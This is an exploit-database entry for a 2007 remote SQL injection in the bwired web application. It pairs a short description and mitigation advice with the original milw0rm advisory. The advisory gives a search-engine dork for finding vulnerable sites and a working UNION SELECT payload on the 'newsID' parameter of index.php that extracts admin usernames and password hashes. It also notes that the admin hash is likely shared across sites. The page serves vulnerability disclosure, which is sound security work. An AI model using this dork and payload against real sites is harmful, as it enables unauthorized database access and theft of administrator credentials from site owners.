bwired - Remote SQL Injection

vendor:

by:

MurderSkillz

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

bwired – Remote SQL Injection

The bwired web application is vulnerable to remote SQL injection. An attacker can exploit this vulnerability by injecting malicious SQL queries in the 'newsID' parameter of the index.php page. This can lead to unauthorized access to the database and potentially sensitive information disclosure.

Mitigation:

To mitigate this vulnerability, the developer should use parameterized queries or prepared statements to handle user input securely. Additionally, input validation and sanitization should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

###############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
###############################################################################################
#Program Title ################################################################################
#bwired - Remote SQL Injection
#
#Note #######################################################################################
#There is also XSS, PHPSESSID session fixation, and cookie manipulation which I will not go into..
#The admin hash will be the same for all the sites I believe. Seeing all the sites are managed by the creator of the webapp.
#Script Website ##############################################################################
#http://web.bwired.com.au
#
#d0rk ######################################################################################
#"Powered by bwired" inurl:?newsID=
#
#Spl0it #########################################################################################
#http://vicsite.com/[pathtobwired]/index.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser
#
#vuln discovered by ###############################################################################
#MurderSkillz
#
#shoutz: z3r0, fish, milf, ScUzZ, godxcel, clorox, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
#fish, rey, canuck, c0ma, grumpy, err0r, sick, trintitty, asdfhacks.com , a59, freeillwill.com, fury,
#<S>, Bernard and everyone else at g00ns.net
###############################################################################################

# milw0rm.com [2007-07-22]